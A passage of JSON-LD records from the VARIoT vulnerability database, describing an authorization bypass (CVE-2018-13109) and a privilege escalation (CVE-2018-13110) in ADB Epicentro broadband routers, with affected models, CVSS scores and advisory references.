"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-1046",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prg av4202n",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv2220",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv5522",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv2210",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv 2210",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "p.rg av4202n",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 2220",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 5522",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "broadband gateways/routers on epicentro platform",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:dv2210_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:dv2210:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv2220_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv2220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv5522_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv5522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:prg_av4202n_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:prg_av4202n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13109"
}
]
},
"cve": "CVE-2018-13109",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-13109",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-12783",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-123135",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-13109",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-13109",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-12783",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-443",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123135",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "All ADB broadband gateways / routers based on the Epicentro platform are affected by an authorization bypass vulnerability where attackers are able to access and manipulate settings within the web interface that are forbidden to end users (e.g., by the ISP). An attacker would be able to enable the TELNET server or other settings as well. plural ADB Broadband gateways and routers contain vulnerabilities related to authorization, authority, and access control.Information may be tampered with. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. A security vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-123135",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123135"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-13109",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "148429",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "44982",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-12783",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97650",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-123135",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"id": "VAR-201807-1046",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
}
]
},
"last_update_date": "2023-12-18T13:56:57.646000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
},
{
"title": "ADBBroadbandGateways/Routers authorize patches to bypass vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/133901"
},
{
"title": "ADB broadband gateways/routers on Epicentro platform Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81864"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/148429/adb-authorization-bypass.html"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2018/jul/18"
},
{
"trust": 2.3,
"url": "https://www.exploit-db.com/exploits/44982/"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/542119/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-13109"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-13109"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"date": "2018-07-06T00:00:00",
"db": "VULHUB",
"id": "VHN-123135"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"date": "2018-07-06T14:29:01.100000",
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"date": "2018-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-123135"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ADB Vulnerabilities related to authorization, authority, and access control in broadband gateways and routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
],
"trust": 0.6
}
}
VAR-201807-1047
Vulnerability from variot - Updated: 2023-12-18 13:28
All ADB broadband gateways / routers based on the Epicentro platform are affected by a privilege escalation vulnerability where attackers can gain access to the command line interface (CLI) if previously disabled by the ISP, escalate their privileges, and perform further attacks. Multiple ADB broadband gateways and routers contain vulnerabilities related to authorization, authority, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). ADB broadband gateways/routers on Epicentro platform is a gateway and router device for the Epicentro platform from ADB, Switzerland. An elevation of privilege vulnerability exists in ADB broadband gateways/routers based on the Epicentro platform.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-1047",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prg av4202n",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv2220",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv5522",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv2210",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv 2210",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "p.rg av4202n",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 2220",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 5522",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "broadband gateways/routers on epicentro platform",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:dv2210_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:dv2210:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv2220_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv2220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv5522_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv5522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:prg_av4202n_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:prg_av4202n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13110"
}
]
},
"cve": "CVE-2018-13110",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-13110",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-12782",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "VHN-123137",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-13110",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-13110",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-13110",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-12782",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-442",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123137",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "All ADB broadband gateways / routers based on the Epicentro platform are affected by a privilege escalation vulnerability where attackers can gain access to the command line interface (CLI) if previously disabled by the ISP, escalate their privileges, and perform further attacks. plural ADB Broadband gateways and routers contain vulnerabilities related to authorization, authority, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. An elevation of privilege vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-123137",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123137"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-13110",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "148430",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "44984",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-12782",
"trust": 0.6
},
{
